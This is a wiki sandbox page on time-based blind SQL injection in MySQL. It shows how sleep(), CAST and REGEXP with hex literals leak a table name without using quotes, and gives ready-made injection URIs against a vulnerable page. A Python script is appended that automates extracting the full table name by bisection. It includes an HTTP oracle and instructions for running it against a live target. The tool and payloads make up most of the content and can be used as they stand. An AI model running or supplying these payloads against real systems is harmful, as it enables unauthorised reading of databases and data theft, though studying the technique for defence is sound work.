Difference between revisions of "User:Mike/Sandbox"

From NetSec
Revision as of 02:26, 2 May 2012

Using sleep() to map a table name with regular expressions

Protip: in MySQL the pattern given to REGEXP does not have to be a quoted string. A hexadecimal literal (0x...) is accepted anywhere a string literal is, so the pattern can be written without quotes.
  mysql> SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1 offset 0;
  +------------+
  | TABLE_NAME |
  +------------+
  | sample     |
  +------------+
  1 row in set (0.00 sec)
  • The first letter of "sample" is s. It is not between a and m, so REGEXP '^[a-m]' returns 0, sleep(0) returns immediately and the query does not sleep at all when we test for that range:
  mysql> SELECT * FROM sample WHERE id=1 AND sleep((SELECT CAST(
           (SELECT (SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1 offset 0) REGEXP '^[a-m]')
         AS signed) * 15));
 Empty set (0.00 sec)
  • When we test for n-z instead, s is in that range, so REGEXP returns 1; multiplied by 15 it becomes 15, which is passed to sleep() and delays the query by 15 seconds:
  mysql> SELECT * FROM sample WHERE id=1 AND sleep((SELECT CAST(
           (SELECT (SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1 offset 0) REGEXP '^[n-z]')
         AS signed) * 15));
 Empty set (15.00 sec)
  • So an injection that uses sleep(), cast() and multiplication can be used remotely where the page output is unpredictable, and without quotes, commas, comment notation or the standard comparison operators (<, =, >). Note that sleep() itself returns 0, so both queries above return an empty set either way; the only signal is the elapsed time. A URI that tests whether the first character of the first table in the current database is between a and m looks like this (0x5e5b612d6d5d is the hex encoding of ^[a-m]):
/vulnerable.ext?id=1 and sleep((select cast((select (select table_name from information_schema.tables where table_schema=database() limit 1 offset 0) regexp 0x5e5b612d6d5d) as signed) * 15));
  • The n-z test (0x5e5b6e2d7a5d encodes ^[n-z]) looks like:
/vulnerable.ext?id=1 and sleep((select cast((select (select table_name from information_schema.tables where table_schema=database() limit 1 offset 0) regexp 0x5e5b6e2d7a5d) as signed) * 15));
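The following script is an added example, not code from the original page: it builds the quote-free sleep()/REGEXP payload shown above and goes beyond the page's two single-range tests by bisecting the identifier alphabet with anchored range patterns until the whole table name is recovered. The target is a constructed stand-in (`simulated_oracle`, secret name `SIMULATED_TABLE_NAME`) that evaluates the decoded hex pattern the way MySQL's REGEXP would and returns the delay sleep() would have cost, so it runs offline; `http_oracle`, its `target.example` URL and the 38-character alphabet are assumptions about a real target and are not exercised here.

```python
import re
import string
import time
import urllib.parse
import urllib.request

# Constructed secret for the simulated target below; a real run never knows this.
SIMULATED_TABLE_NAME = "sample"

# Assumed identifier alphabet, sorted by code point so contiguous slices can be
# written as regex ranges such as a-m (none of these are special inside [...]).
ALPHABET = sorted(string.ascii_lowercase + string.digits + "_$")


def hex_literal(s):
    """Encode a string as a MySQL hexadecimal literal (0x...), which MySQL accepts
    wherever a quoted string literal is accepted; this is what avoids the quotes."""
    return "0x" + s.encode("latin-1").hex()


def build_payload(pattern, delay=15, offset=0):
    """The page's injection: REGEXP yields 0 or 1, multiplied by `delay`, then passed
    to sleep(). The CAST is kept as on the page although REGEXP already returns an int."""
    return (
        "1 and sleep((select cast((select (select table_name from "
        "information_schema.tables where table_schema=database() "
        f"limit 1 offset {offset}) regexp {hex_literal(pattern)}) as signed) * {delay}))"
    )


def char_class(chars):
    """Bracket expression for a sorted character list, compressing runs of consecutive
    code points into ranges: ALPHABET[:19] -> "[$0-9_a-g]"."""
    parts, i = [], 0
    while i < len(chars):
        j = i
        while j + 1 < len(chars) and ord(chars[j + 1]) == ord(chars[j]) + 1:
            j += 1
        parts.append(f"{chars[i]}-{chars[j]}" if j - i >= 2 else "".join(chars[i:j + 1]))
        i = j + 1
    return "[" + "".join(parts) + "]"


def escape_prefix(prefix):
    """Outside [...] the '$' of an identifier is an end anchor in both MySQL's and
    Python's regex dialects, so it is the one alphabet character needing an escape."""
    return "".join("\\" + c if c == "$" else c for c in prefix)


def simulated_oracle(payload):
    """Constructed stand-in for the vulnerable endpoint: decodes the hex literal out of
    the payload, matches it like MySQL REGEXP (unanchored search, case-insensitive for
    non-binary strings) against SIMULATED_TABLE_NAME, and returns the seconds sleep()
    would have cost, without actually sleeping."""
    m = re.search(r"regexp 0x([0-9a-f]+)\) as signed\) \* (\d+)\)\)$", payload)
    pattern = bytes.fromhex(m.group(1)).decode("latin-1")
    delay = int(m.group(2))
    return float(delay) if re.search(pattern, SIMULATED_TABLE_NAME, re.IGNORECASE) else 0.0


def http_oracle(base_url="http://target.example/vulnerable.ext?id=", timeout=60):
    """Assumed live oracle (not exercised here): times a GET to the page's URI shape.
    Spaces and '*' must be URL-encoded, and `delay` must exceed normal round-trip
    jitter for the half-delay threshold in is_slow() to be reliable."""
    def oracle(payload):
        url = base_url + urllib.parse.quote(payload, safe="()=,")
        start = time.monotonic()
        urllib.request.urlopen(url, timeout=timeout).read()
        return time.monotonic() - start
    return oracle


def is_slow(oracle, pattern, delay):
    """True when the query took at least half of `delay`, i.e. REGEXP returned 1."""
    return oracle(build_payload(pattern, delay)) >= delay / 2


def extract_table_name(oracle, delay=15, max_len=64):
    """Recover the first table name one character at a time, bisecting ALPHABET with
    anchored range patterns (^prefix[range]) so each character costs ~log2(38) requests."""
    name = ""
    for _ in range(max_len):
        if is_slow(oracle, "^" + escape_prefix(name) + "$", delay):
            return name  # ^name$ matched: the whole name has been recovered
        lo, hi = 0, len(ALPHABET)
        while hi - lo > 1:
            mid = (lo + hi) // 2
            if is_slow(oracle, "^" + escape_prefix(name) + char_class(ALPHABET[lo:mid]), delay):
                hi = mid
            else:
                lo = mid
        ch = ALPHABET[lo]
        # bisection only ever tested lower halves; confirm the survivor explicitly
        if not is_slow(oracle, "^" + escape_prefix(name + ch), delay):
            raise ValueError(f"character {len(name)} is outside the assumed alphabet")
        name += ch
    raise ValueError("name longer than max_len")


if __name__ == "__main__":
    print(build_payload("^[a-m]"))
    print(extract_table_name(simulated_oracle))
```

Against a live target, `extract_table_name(http_oracle("http://host/vulnerable.ext?id="))` drives the same logic with real timings; raise `delay` if the site's normal response time is anywhere near half of it, and remember that sleep() runs once per row the outer WHERE matches, so an `id` that selects several rows multiplies the delay.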